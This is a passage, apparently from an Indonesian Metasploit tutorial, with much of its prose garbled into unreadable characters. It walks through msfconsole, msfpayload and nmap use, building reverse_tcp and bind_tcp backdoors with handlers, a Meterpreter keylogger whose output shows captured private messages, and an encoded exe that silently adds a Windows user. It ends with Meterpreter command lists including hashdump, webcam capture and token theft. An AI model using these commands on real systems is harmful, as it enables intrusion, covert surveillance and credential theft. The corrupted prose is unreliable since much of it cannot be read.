-rw-r--r-- 1 root root 3811 2012-02-21 08:50 ms06_066_nwapi.rb
-rw-r--r-- 1 root root 3442 2012-02-21 08:50 ms06_066_nwwks.rb
-rw-r--r-- 1 root root 5632 2012-02-21 08:50
ms06_070_wkssvc.rb
-rw-r--r-- 1 root root 8060 2012-02-21 08:50
ms07_029_msdns_zonename.rb
-rw-r--r-- 1 root root 32145 2012-02-21 08:50 ms08_067_netapi.rb
-rw-r--r-- 1 root root 5703 2012-02-21 08:50
ms09_050_smb2_negotiate_func_index.rb
-rw-r--r-- 1 root root 11401 2012-02-21 08:50
ms10_061_spoolss.rb
-rw-r--r-- 1 root root 4707 2012-02-21 08:50
netidentity_xtierrpcpipe.rb
-rw-r--r-- 1 root root 10031 2012-02-21 08:50 psexec.rb
-rw-r--r-- 1 root root 14648 2012-02-21 08:50 smb_relay.rb
drwxr-xr-x 6 root root 4096 2012-02-23 00:30 .svn
-rw-r--r-- 1 root root 4180 2012-02-21 08:50
timbuktu_plughntcommand_bof.rb
RH)ST a&a%ah o6si i6 tar1et. 4a&a tar$et sa"a isika# 1:'.169.1.:> Be/era2a
e12%,it -e-akai 'HOST @ ip attacker B "a#$ #a#ti#"a aka# kita /ahas 2a&a /a$ia#
/erik.t &ari -,&.% i#i.
PA:'OAD a&a%ah ,2si cara e12%,it -e#$,#tr,% tar$et siste- shell1
E a&a%ah execute a&a%ah ,2si a$ar -s+c%i se$era -e#$esek.si modul exploit.
4erhatika# 2a&a $a-/ari &i atas > &i-a#a +ra-e<,rk -e%ak.ka# e12%,it &e#$a#
/er/a$ai taha2. Sa"a tertarik &e#$a# Iautomatically detecting the targetJ &i-a#a
+ra-e<,rk aka# -e#&eteksi i#+,r-asi tar$et a2akah s.&ah ses.ai &e#$a# "a#$ &i
/.t.hka# ata. ti&ak.
4a&a $a-/ar &i atas +ra-e<,rk te%ah /erhasi% -e%aksa#aka# t.$as#"a &a# -e-/.ka
she%% k,r/a# %a#$s.#$ -e#.j. c:\WINDOWS\system32>
%.%. s3conso/e
Ms+c,#s,%e a&a%ah shell command prompt &ari +ra-e<,rk > &i-a#a se%.r.h -,&.%e
&a2at &i akses &a# &i -a#a$e &i si#i. 4a&a /acktrack kita ti#$$a% -e-as.ka#
2eri#tah -s+c,#s,%e .#t.k -e-a#$$i%#"a.
%.%.$. 5s3conso/e c5d co55and
Me#arik .#t.k &i ketah.i > -s+c,#s,%e -e-i%iki a/i%iti .#t.k -e#$esek.si /e/era2a
c,--a#& &a%a- c-&. C,#t,h saja se2erti 2i#$> i+c,#+i$> &s/.
%.%.%. Perinta2 5ana;e5en e<6/oit
Ms+c,#s,%e &i$.#aka# .#t.k -e-.&ahka# 2e#$$.#a -e-i%ih exploit, payload
/eserta 2ara-eter2ara-eter %ai##"a. (#t.k it. /e/era2a 2eri#tah sta#&art
2e#$$.#aa# sa"a ra#$k.- se/a$ai /erik.t .
Searc2 e<6/oit
Kita &a2at -e%ak.ka# 2e#caria# terha&a2 exploit /er&asarka# Ike"<,r&J terte#t..
en114nakan e<6/oit
(#t.k -e#$$.#aka# e12%,it terte#t. kita /isa -e#$$.#aka# 2eri#tah IuseJ se-isa%
sa"a -e#$$.#aka# e12%,it /r,<serFa.t,2<# sa"a aka# -e-as.ka# 2eri#tah use
auxilary!server!bro0ser<autop0n1
Ms+ s.22,rt terha&a2 2e#eka#a# t,-/,% tab .#t.k -e#cari &irekt,ri ata. +i%e
terte#t.. Sehi#$$a sa#$at &i a#j.rka# a$ar e12%,iter -e#$etah.i ter%e/ih &ah.%.
&irekt,ri e12%,it "a#$ he#&ak &i2akai @ use B ata. -e#$$.#aka# fasilitas search1
e/i2at o6si e<6/oit
Sete%ah kita -e#$$.#aka# e12%,it terte#t. @ use B > -s+c,#s,%e -e-/erika#
ke-.&aha# /a$i .ser .#t.k -e-as.ka# ,2si,2si "a#$ &i har.ska# @ reIuired B
&a# /e/era2a ,2si %ai##"a 2a&a e12%,it terse/.t. A#&a &a2at -e#$$.#aka# +asi%itas
i#i &e#$a# 2eri#tah Isho0 optionsJ
4erhatika# ,.t2.t &ari 2eri#tah sh,< ,2ti,#s. Ta/e% &i /a<ah aka# -e#je%aska#
setia2 k,%,- "a#$ ta-2i%.
No.$ Ko/o5 Keteran1an
1 Na-e Na-a ,2si
' C.rre#t Setti#$ Seti#$a# &e+a.%t @ seti#$a# se/e%.- &i
r./ah B
0 ReU.ire& =aji/ ti&ak#"a ,2si terse/.t @ "es A
#, B
3 Descri2ti,# Ketera#$a# &ari ,2si
en1isi o6si+o6si e<6/oit
Sete%ah kita -e#e%iti ,2si E ,2si > kita har.s -e#$e&it#"a &e#$a# 2eri#tah
I set [ opsi ] [ isi opsi ]. I
Jika s.&ah se%esai kita ke-/a%i -e#$ecek a2a/i%a ta/%e ,2si e12%,it s.&ah &i .2&ate
ses.ai ke/.t.ha# kita
Esek4si e<6/oit
La#$kah se%a#j.t#"a sete%ah se-.a ,2si te%ah kita isi &e#$a# te2at &a# ses.ai
&e#$a# ke2er%.a# kita> -aka kita sia2 .#t.k -e%a#carka# sera#$a# &e#$a# e12%,it
terse/.t. Lak.ka# 2eri#tah Ie12%,itJ ata. Iexploit 68J .#t.k 2eri#tah -e#ja%a#ka#
e12%,it 2a&a background1 E12%,it 2a&a -etas2%,it ter/a$i -e#ja&i ' /a$ia#.
$. E<6/oit Akti3
E12%,it akti+ a&a%ah &i -a#a -e-i%iki -et,&e akti+ @ r.# B se/e%.- k,-2%it &a# aka#
-e#$he#tika# ke$iata# sete%ah -eter2reter ter/e#t.k.
msf e!ploit$ms%&'%()'netapi* + e!ploit -,
[- .!ploit running as /ac0ground ,o/.
msf e!ploit$ms%&'%()'netapi* +
%. E<6/oit Pasi3
E12%,it aka# akti+ 2a&a saat tar$et -e#$esek.si .-2a# /ack&,,r. 4ri#si2 "a#$ sa-a
/isa &itarik &ari #etcat. E12%,it i#i aka# -e#.#$$. h,st "a#$ -eres2,# &a#
ke-.&ia# -e%a#carka# sera#$a#.
msf e!ploit$ani'loadimage'chun0size* + e!ploit
[- .!ploit running as /ac0ground ,o/.
e/i2at da3tar =4/nerabi/it7 tar1et
Abi/iti %ai##"a ia%ah ke-a-2.a# -e%ihat &a+tar tar$et a2%ikasi ata. ,2erati#$ s"ste-
"a#$ -e-iki%iki ke-.#$ki#a# !.r%# terha&a2 e12%,it terte#t.. Kita &a2at
-e#$$.#aka# 2eri#tah Isho0 targetsJ Ti&ak se-.a e12%,it &a2at kita e12%,itasi
&e#$a# 2eri#tah i#i.
%.9. Pa7/oad
4a"%,a& ata. -.ata# ter&iri &ari 0 /a$ia# > single, stage, stager > Se/a$ai c,#t,h
2a"%,a& si#$%e I0indo0s!shell<bind<tcpJ &a# c,#t,h %ai##"a a&a%ah
I0indo0s!shell!bind<tcpJ &i -a#a she%% a&a%ah sta$e &a# /i#&Ftc2 a&a%ah sta$er.
%.9.$. Ti6e Pa7/oad
4a"%,a& -e-i%iki /er/a$ai ti2e > /e/era2a &i a#tara#"a a&a%ah
$. In/ine ? non # sta1ed @
Se/.ah -.ata# @2a"%,a& B t.#$$a% "a#$ /erisi eks2%,itasi &a# k,&e she%% 2e#.h
.#t.k t.$as "a#$ &i2i%ih. M.ata# *#%i#e &i&esai# sta/i% Kare#a -e-i%iki k,#se2 Iall
in oneJ. Na-.# /e/era2a eks2%,itasi ti&ak -e#&.k.#$ .k.ra# "a#$ &ihasi%ka# ,%eh
je#is -.ata# i#i.
%. Sta1ed
Sta$$er -.ata# /ekerja sa-a &e#$a# sta$e -.ata# &a%a- -e#"e%esaika# t.$as
terte#t.. Sta$er -e-/.ka cha##e% k,-.#ikasi a#tara attacker &a# tar$et > &a#
-e-/aca sta$e 2a"%,a& .#t.k -e#$esek.si tar$et.
9. eter6reter
Meter2reter -er.2aka# si#$kata# &ari -eta i#ter2reter > -er.2aka# Imulti6facetedJ
2a"%,a& "a#$ /erkerja -e%a%.i in8eksi &%%. Meter2reter /era&a se2e#.h#"a &a%a-
-e-,ri &ari re-,te h,st &a# ti&ak -e#i#$$a%ka# jejak 2a&a har& &ri!e> sehi#$$a
sa#$at s.%it &i&eteksi &e#$a# teknik forensik konvensional. Scri2t &a# 2%.$i# &a2at
&i-.at &a# &i/,#$kar secara &i#a-is ses.ai ke/.t.ha# &a# 2e#$e-/a#$a#
Meter2reter sa#$at k.at &a# ter.s /erke-/a#$.
). Passi=e-
M.ata# i#i &i $.#aka# .#t.k -e-JbypassJ +ire<a%% > Ha% i#i &i%ak.ka#
&e#$a# -e#$$.#aka# k,#tr,% Active5 .#t.k -e-/.at se/.ah Ihidden
instanceJ &ari Internet %xplorer. De#$a# -e#$$.#aka# k,#tr,% Active5
/ar.> ter/e#t.k%ah k,-.#ikasi a#tara 2e#"era#$ &a# tar$et h,st -e%a%.i
2er-i#taa# @reU.estB &a# ta#$$a2a# @ responses B HTT4
*. NoN-
>o>5 payload ata. >o e5ecute payload. Mer.2aka# i-2%e-e#tasi se/a$ai Data
%xecution -revention 2D%-3. &etasploit >o>5 payloads &i &esi$# .#t.k circumvent
D%-1
.. Ord
)r&i#a% 2a"%,a& a&a%ah =i#&,<s stager berbasis payload. 4a"%,a& i#i -e-i%iki
ke.#$$.%a# &a# ke%e-aha# -e-/.at 2a"%,a& i#i ha#"a -e#ja&i a%ter#ati+ saja.
&. IP=.
Di$.#aka# &a%a- -e#"era#$ ti2e i2 a&&ress I-v"
A. Re3/ecti=e D'' In;ection
A&a%ah s.at. teh#ik &i -a#a sta$e 2a"%,a& &i i#jeksika# -e#.j. ke2a&a 2r,ses "a#$
se&a#$ /erja%a# 2a&a -e-,ri tar$et. Teh#ik i#i ti&ak -e#$hasi%ka# /ack&,,r @
maintaining access B sehi#$$a /isa &ikataka# rea%ti-e i#jecti,#.
%.9.%. e5b4at Pa7/oad
(#t.k -e-/.at 2a"%,a& &ari +ra-e<,rk> kita &a2at -e-/.at#"a &ari -s+c,#s,%e
ata. -e#$$.#aka# -s+2a"%,a&.
A. e5b4at 6a7/oad dari 5s3conso/e.
Da%a- -e-/.at 2a"%,a& &ari -s+c,#s,%e> 2a&a c,--a#& 2r,-2t kita /isa
-e-as.ka# 2a"%,a& "a#$ he#&ak kita 2akai &e#$a# -e#$$.#aka# 2eri#tah I.seJ
se/a$ai c,#t,h> sa"a aka# -e#$$.#aka# sta$er 2a"%,a&
I2a"%,a&A<i#&,<sAshe%%A/i#&Ftc2J 4erhatika# c,#t,h $a-/ar &i atas> +.#$si 2eri#tah
IhelpJ -e#.#j.ka# /er/a$ai ,2si 2eri#tah.
Sa-a se2erti -e#$$.#aka# e12%,it 2a&a msfconsole "a#$ te%ah kita /ahas
se/e%.-#"a> kita /isa -e%ihat opsi6opsi field "a#$ har.s &iisika# 2a&a ti2e payload
terte#t. "a#$ te%ah &i 2a#$$i%.
Ke-.&ia# -e#$isi ,2si,2si &e#$a# 2ara-eter 7setH . 4a&a $a-/ar &i atas sa"a
-e-/erika# !a%.e 2a&a +ie%& RH)ST. La#$kah se%aj.t#"a a&a%ah -e-eri#tahka#
+ra-e<,rk .#t.k -e-/.at 2a"%,a& ses.ai &e#$a# !a%.e.
". 5s36a7/oad
4e-/.ata# -.ata# %a#$s.#$ &ari msfpayload sa#$at &i a#j.rka#. Me#$i#$at
-s+c,#s,%e -e-/.t.hka# <akt. "a#$ %a-a &a%a- -e%ak.ka# start prossesing.
Na-.# -e#$$.#aka# -s+c%i &a# -s+2a"%,a& -e-/.t.hka# 2e-aha-a# &a#
2e#$etah.a# te#ta#$ 2a"%,a& it. se#&iri. Ketika# msfpayload help 2a&a ter-#a%
.#t.k -e#&a2atka# +,r-at &asar 2e-/.ata# -s+2a"%,a&.
root@eichel:~# msfpayload help
Usage: /opt/framework/msf3/msfpayload [<options>] <payload>
[var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|
[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads
(#t.k -e-/.at 2a"%,a& &ari -s+2a"%,a&> kita &a2at -e-as.ka# 2ath serta /e/era2a
,2si &a%a- sat. 2eri#tah
4a&a $a-/ar &i atas sa"a -e-/erika# c,#t,h .#t.k -e-/.at 2a"%,a&
I0indo0s!shell!reverse<tcpJ &e#$a# ,2si ,?@*(KAB1A"C1A1AFA &a# ke-.&ia# &i
si-2a# ata. &i $e#erate 2a&a &irekt,ri I!tmpJ &e#$a# /e#t.k IexeJ serta /er#a-a
Eee6eichel1exe. Jika /erhasi% &a# ti&ak a&a err,r -aka msfpayload -e-/eritah.ka#
/erhasi%#"a 2a"%,a& &i /e#t.k &e#$a# i#+,r-asi ti2e 2a"%,a&> /esarA2a#ja#$ 2a"%,a&
&a# )2si "a#$ &i$.#aka#.
9 In3or5ation 1at2erin1
8ra-e<,rk -etas2%,it -e-i%iki ke-a-2.a# &a%a- 2e#$.-2.%a# i#+,r-asi tar$et
Iinformation gatheringJ. Se2erti "a#$ kita tah. /ersa-a > /ah<a i#+,r-ati,#
$atheri#$ -er.2aka# taha2 a<a% &a%a- -e%ak.ka# e12%,itasi %e/ih %a#j.t. 4er%.
a&a#"a kesa&ara# aka# 2e#ti#$#"a i#+,r-asi &etai% se2erti #et<,rk> a2%ikasi> siste-
,2erasi "a#$ &i$.#aka#.
9.$. dbRconnect
(#t.k -e#$akti+ka# i#+,r-ati,# $atheri#$ &e#$a# /a#"ak h,sts &a%a- sat. ra#$e
#et<,rk kita har.s -e#$akti+ka# &ata/ase "a#$ ke-.&ia# kita .ji kea/saha#
k,#ekti!itas &e#$a# 2eri#tah I?ostsJ 4eri#tah i#i aka# -e#$e%.arka# ,.t2.t /er.2a
ta/%e. Di -a#a #a#ti#"a ta/%e terse/.t -er.2aka# /e#t.k i-2%e-e#tasi ta/%e
&ata/ase. Data/ase "a#$ &i$.#aka# 2a&a -s+3 secara &e+a.%t a&a%ah Ipostgre*L,J.

).t2.t 2a&a 2eri#tah hosts -e#.#j.ka# &ata/se secara ta/%e &a# isi ta/%e 2a&a
&ata/ase.
9.%. dbRn5a6
S.&ah kita /ahas 2a&a /a$ia# %ai##"a -e#$e#ai #-a2. N-a2 ata. net0ork mapper
-e-i%iki ke-a-2.a# .#t.k -e#$.-2.%ka# info6info vital &ari tar$et. 8ra-e<,rk
-etas2%,it &a2at &i 2a&.ka# &e#$a# #-a2. Se/a$ai c,#t,h sa"a -e#c,/a -e%ak.ka#
sca##i#$ &e#$a# -e#$$.#aka# #-a2 "a#$ &i 2a&.ka# &e#$a# -etas2%,it
+ra-e<,rk. 8,r-at#"a a&a%ah nmap [opsi] [opsi] [subnet-range]
[opsi] [nama-file-xml]
msf > nmap -v -sV 192.168.1.1/24 -oA subnet_1
[*] exec: nmap -v -sV 192.168.1.1/24 -oA subnet_1
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-03-05 13:57
WIT
NSE: Loaded 9 scripts for scanning.
Initiating ARP Ping Scan at 13:57
Scanning 5 hosts [1 port/host]
Completed ARP Ping Scan at 13:57, 0.22s elapsed (5 total hosts)
Initiating Parallel DNS resolution of 5 hosts. at 13:57
Completed Parallel DNS resolution of 5 hosts. at 13:57, 0.06s
elapsed
Nmap scan report for 192.168.1.0 [host down]
Initiating Parallel DNS resolution of 1 host. at 13:57
Completed Parallel DNS resolution of 1 host. at 13:57, 0.06s
elapsed
Initiating SYN Stealth Scan at 13:57
Scanning 2 hosts [1000 ports/host]
Discovered open port 139/tcp on 192.168.1.2
Completed SYN Stealth Scan against 192.168.1.2 in 2.72s (1 host
left)
Completed SYN Stealth Scan at 13:57, 4.52s elapsed (2000 total
ports)
Initiating Service scan at 13:57
Scanning 6 services on 2 hosts
Completed Service scan at 13:57, 6.07s elapsed (6 services on 2
hosts)
Not shown: 997 filtered ports
21/tcp open ftp Netgear broadband router or ZyXel VoIP
adapter ftpd 1.0
23/tcp open telnet Netgear broadband router or ZyXel VoIP
adapter telnetd
80/tcp open http Allegro RomPager 4.07 UPnP/1.0 (ZyXEL
ZyWALL 2)
MAC Address: 54:E6:FC:D2:98:6D (Tp-link Technologies CO.)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:19:D2:45:4D:96 (Intel)
Service Info: OS: Windows
Initiating ARP Ping Scan at 13:57
Scanning 250 hosts [1 port/host]
Completed ARP Ping Scan at 13:57, 2.03s elapsed (250 total
hosts)
Initiating Parallel DNS resolution of 250 hosts. at 13:57
Completed Parallel DNS resolution of 250 hosts. at 13:57, 0.07s
elapsed
Scanning 192.168.1.5 [1000 ports]
ports)
All 1000 scanned ports on 192.168.1.5 are closed

Scanning 3 hosts [1000 ports/host]
Completed SYN Stealth Scan against 192.168.1.50 in 0.70s (2
hosts left)
Increasing send delay for 192.168.1.7 from 0 to 5 due to 14 out
of 45 dropped probes since last increase.
Completed SYN Stealth Scan against 192.168.1.14 in 10.54s (1 host
left)
ports)
Scanning 1 service on 3 hosts
Completed Service scan at 13:57, 6.19s elapsed (1 service on 3
hosts)
All 1000 scanned ports on 192.168.1.7 are closed
MAC Address: E4:EC:10:67:63:2C (Nokia)
All 1000 scanned ports on 192.168.1.14 are filtered
MAC Address: 08:00:27:C8:DB:82 (Cadmus Computer Systems)
80/tcp open http DD-WRT milli_httpd
MAC Address: 00:1E:C1:4C:BF:F6 (3com Europe)
Service Info: OS: Linux; Device: WAP
Read data files from: /opt/framework/share/nmap
Service detection performed. Please report any incorrect results
at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (6 hosts up) scanned in 31.94
seconds
Raw packets sent: 8537 (367.532KB) | Rcvd: 5015
(204.580KB)
Sete%ah ,2erasi #-a2 se%esai > #-a2 secara ,t,-atis -e-/.at re2,rt hasi% &e#$a#
+,r-at xml> 2a&a c,#t,h &iatas sa"a -e#a-ai#"a s./#etF1. Maka %a#$kah
se%a#j.t#"a kita har.s -e#$i-2,rt hasi% &ari +,r-at xml terse/.t 2a&a &ata /ase.
msf > db_import subnet_1.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.4.3.1'
[*] Importing host 192.168.1.1
[*] Successfully imported /root/subnet_1.xml
Kita c,/a ta-2i%ka# isi &ari &ata/ase "a#$ te%ah &ii-2,rt /ar.sa#
msf > hosts
Hosts
=====
address mac name os_name os_flavor
os_sp purpose info comments
------- --- ---- ------- ---------
----- ------- ---- --------
192.168.1.1 54:E6:FC:D2:98:6D Unknown
server
192.168.1.2 00:19:D2:45:4D:96 Unknown
device
192.168.1.4 8C:7B:9D:63:48:AB
192.168.1.6 00:00:39:90:B6:D9
192.168.1.50 00:1E:C1:4C:BF:F6 Unknown
device
Kita /isa -e#a-2i%ka# ha#"a /e/era2a i#+,r-asi "a#$ kita /.t.hka# > -isa%#"a
sa"a ha#"a i#$i# -e#a-2i%ka# i#+,r-asi -ac a&&ress saja
msf > hosts -c address,mac
Hosts
=====
address mac
------- ---
192.168.1.1 54:E6:FC:D2:98:6D
192.168.1.2 00:19:D2:45:4D:96
192.168.1.4 8C:7B:9D:63:48:AB
192.168.1.6 00:00:39:90:B6:D9
192.168.1.50 00:1E:C1:4C:BF:F6
Ata. sa"a -e#c,/a .#t.k -e#a-2i%ka# i#+,r-asi 2,rt
msf > services -c port,state
Services
========
host port state
---- ---- -----
192.168.1.1 21 open
192.168.1.1 23 open
192.168.1.1 80 open
192.168.1.2 135 open
192.168.1.2 445 open
192.168.1.2 139 open
192.168.1.4 62078 open
192.168.1.6 2869 closed
192.168.1.50 80 open
). AINTAINING ACCESS
Sa%ah sat. 2r,ses "a#$ sa#$at &i$e-ari ,%eh 2ara attacker a&a%ah Imaintaining
accessJ &i-a#a attacker aka# -e-/.at /ack&,,r .#t.k -e-.#$ki#ka# attacker
-e-as.ki siste- tar$et &i %ai# <akt..
).$. s2e//Rre=erseRtc6
Reverse<tcp se/e#ar#"a -er.2aka# teh#ik &i-a#a attacker -e-aksa -esi# tar$et
.#t.k -e#$akses -esi# attacker -e%a%.i /ack&,,r "a#$ &i/.at ke-.&ia# -e-/.ka
k,#eksi she%% /er&asarka# je#is 2a"%,a& "a#$ &i i#c%.&e 2a&a /ack&,,r.
A<a% 2erta-a attacker aka# -e-/.at /ack&,,r "a#$ -e-i%iki i#+,r-asi ,?@*(
2 ip!host 3 ata. a%a-at -esi# attacker.
Kita /erhasi% -e-/.at /ack&,,r &e#$a# +,r-at 0indo0s!shell!reverse<tcp &e#$a#
,?@*( ! ip attacker K AB1A"C1A1= &a# sa"a /eri #a-a Heere!erseshe%%.e1e.
Sete%ah /ack&,,r &i /.at > .2%,a& /ack&,,r terse/.t &a%a- -esi# tar$et &a# attacker
ti#$$a% /erhara2 /ack&,,r &iesek.si ,%eh tar$et.
Ke-.&ia# attacker aka# -e-/.ka k,#eksi @ port #### default port B sehi#$$a -esi#
tar$et aka# -e%ak.ka# k,#eksi sete%ah -e#$esek.si /ack&,,r "a#$ te%ah &i /.at
2a&a %a#$kah a<a%
root@eichel:~# msfcli exploit/multi/handler
PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.5 E
Ketika tar$et -e-aka# .-2a# /a%ik tc2 -i%ik attacker > se/.ah she%% &ari -esi#
tar$et ter/.ka /.at attacker.
Jika a#&a i#$i# -er./ah 2a"%,a& -e#ja&i -eter2reter -aka a#&a ti#$$a% ha#"a
-e#$./ah ti2e payload 2a&a backdoor dan listener.
Da# 2a&a 2a"%,a& &i %iste#er
msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.5 E
Maka e12%,it &e#$a# 2a"%,a& -eter2reter /erhasi% &i esek.si &e#$a# /aik.
).%. s2e//RbindRtc6
(#t.k -e-/.at se/.ah /ack&,,r "a#$ -e-i%iki she%% /i#& ata. -e-aksa 2c tar$et
-e-/.ka 2,rt terte#t. &a# -e#ja&i %iste#er &i-a#a attacker aka# -e%ak.ka# she%%
k,#ekti#$ -e%a%.i #etcat &a# -e-as.ki she%% .ser 2a&a ser!er tar$et.
(#t.k it. sa"a -e-/eri c,#t,h &e#$a# -e#$$.#aka# -s+2a"%,a&.
Sa"a -e-/.at se/.ah /ack&,,r "a#$ sa"a /eri #a-a Hee$a#te#$.e1e &a# tersi-2a#
2a&a &irekt,ri !tmp1 4i%iha# 2,rt %)A% a&a%ah ,2si saja > a#&a /isa -e-i%ih 2,rt "a#$
%ai#. Ke-.&ia# attacker aka# -e-.%ai #etcat &a# -e#c,/a -e%ak.ka# she%% c,##ect
-e%a%.i 2,rt "a#$ &i hara2ka# /erhasi% &i /.ka ,%eh -esi# tar$et &a%a- c,#t,h i#i
a&a%ah 2,rt %)A9. Jika /ack&,,r "a#$ te%ah &i /.at ta&i &iesek.si ,%eh tar$et > -aka
kita -e#&a2at akses she%% &i -.%ai &ari &irekt,ri &i -a#a /ack&,,r terse/.t /era&a
2a&a -esi# tar$et
).9. eter6reter Ke7/o11er
Kita &a2at -e-/.ka -e#catat se-.a hasi% ke"str,kes 2a&a k,r/a# &e#$a#
-e#$akti+ka# keylogger 2a&a siste- k,r/a# &e#$a# -e#$$.#aka# meterpreter.
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 1528
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to
/root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20120305.125
5.txt
[*] Recording
^C[*] Saving last few keystrokes
[*] Interrupt
[*] Stopping keystroke sniffer..
4erhatika# ,.t2.t &i atas> &i-a#a keylogerecorder -e#"i-2a# hasi% keystroke 2a&a
&irekt,ri
/root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20120
305.1255.txt. Jika kita /.ka +i%e terse/.t -aka kita aka# -e%ihat a2aa2a saja
"a#$ &iketika# k,r/a# -e%a%.i ke"/,ar&#"a
root@eichel:~# cat
/root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20120305.125
5.txt
facebook.com <Return> robert@yahoo.com <Back> .id <Tab>
apasajalah <Return>
kamu di mana sayang ? <Return> apakah kamu sudah makan ?
<Return>
).). ena5ba2 4ser 6ada siste5 windows
(#t.k -e#a-/ah .ser 2a&a siste- <i#&,<s &e#$a# -eter2reter kita har.s -e-/.at
esek.si i#jeksi !ir.s#"a ter%e/ih &ah.%.. La#$kah%a#$kah#"a a&a%ah se/a$ai /erik.t
.
Ter%e/ih &ah.%. kita -as.k ke &irekt,ri +ra-e<,rk
root@eichel:~# cd /pentest/exploits/framework
root@eichel:/pentest/exploits/framework# ls
armitage external modules msfconsole msfencode
msfpayload msfrpc msfvenom scripts subnet_1.xml
data HACKING msfbinscan msfd msfgui
msfpescan msfrpcd plugins subnet_1.gnmap test
documentation lib msfcli msfelfscan msfmachscan
msfrop msfupdate README subnet_1.nmap tools
Ke-.&ia# kita esek.sika# -s+2a"%,a& "a#$ &i k,-/i#asika# &e#$a# msfencode
root@eichel:/pentest/exploits/framework# ./msfpayload
windows/adduser pass=coba user=ibt r | ./msfencode -t exe -e
x86/shikata_ga_nai -c 10 -o addinguser.exe
[*] x86/shikata_ga_nai succeeded with size 294 (iteration=1)
De#$a# as.-si se/a$ai /erik.t
Pa7/oad ^ <i#&,<sAa&&.ser &e#$a# ,2si 2ass^c,/a &a# .serî/t. (ser
"a#$ aka# &i /.at #a#ti#"a a&a%ah .ser#a-e^ i/t &e#$a# 2ass<,r& ^ c,/a.
8i%e "a#$ &i/.at /erti2e e1e &e#$a# je#is 196 serta /er#a-a
a&&i#$.ser.e1e
Ketika .ser tar$et -e#$esek.si +i%e terse/.t -aka .ser "a#$ &i -i#ta aka#
&ita-/ahka# secara 2aksa &a%a- siste- .ser tar$et.
*. ETERPRETER
Sa%ah sat. 2a"%,a& "a#$ terke#a% 2a&a -etas2%,it +ra-e<,rk a&a%ah -eter2reter.
Meter2reter a&a%ah extensible payload "a#$ &i#a-ik &a# -.&ah &a%a-
2e#$e%,%a##"a. Ha% it. "a#$ -e-/.at -eter2reter seri#$ -e#ja&i 2i%iha# 2a"%,a&.
eter6reter -e#$$.#aka# stagers D,, "a#$ &ii#jeksi 2a&a -e-,ri &a#
&i2er2a#ja#$ -e%a%.i jari#$a# secara r.#ti-e. Meter2reter /erk,-.#ikasi -e%a%.i
s,ket sta$ers &a# -e#"e&iaka# k,-2rehe#si+ sisi k%ie# @ c%ie#t si&e B Ruby A-I.
(#t.k -e%ihat ,2si,2si 2a&a -eter2reter kita $.#aka# 2eri#tah IhelpJ
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a
background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for
http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post
module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the
current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the
target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been
idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local
system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
*.$. en1ena/ dan 5e5i/i2 session
Se2erti "a#$ te%ah se-2at &isi#$$.#$ se/e%.-#"a > -eter2reter -er.2aka# -.ata#
"a#$ aka# /erk,-.#ikasi -e#$$.#aka# sta$ers DLL. Se/.ah k,-.#ikasi "a#$
te%ah ter/e#t.k &e#$a# se-2.r#a a#tara -esi# attacker &a# -esi# tar$et &ise/.t
se/a$ai sessi,#s.
[*] Meterpreter session 1 opened (192.168.1.5:4444 ->
192.168.1.2:1088) at 2012-03-05 18:02:54 +0700
Se/.ah -eter2reter 2a&a sessi,#s 1 ter/.ka -e%a%.i 2,rt )))) 2a&a a%a-at attacker
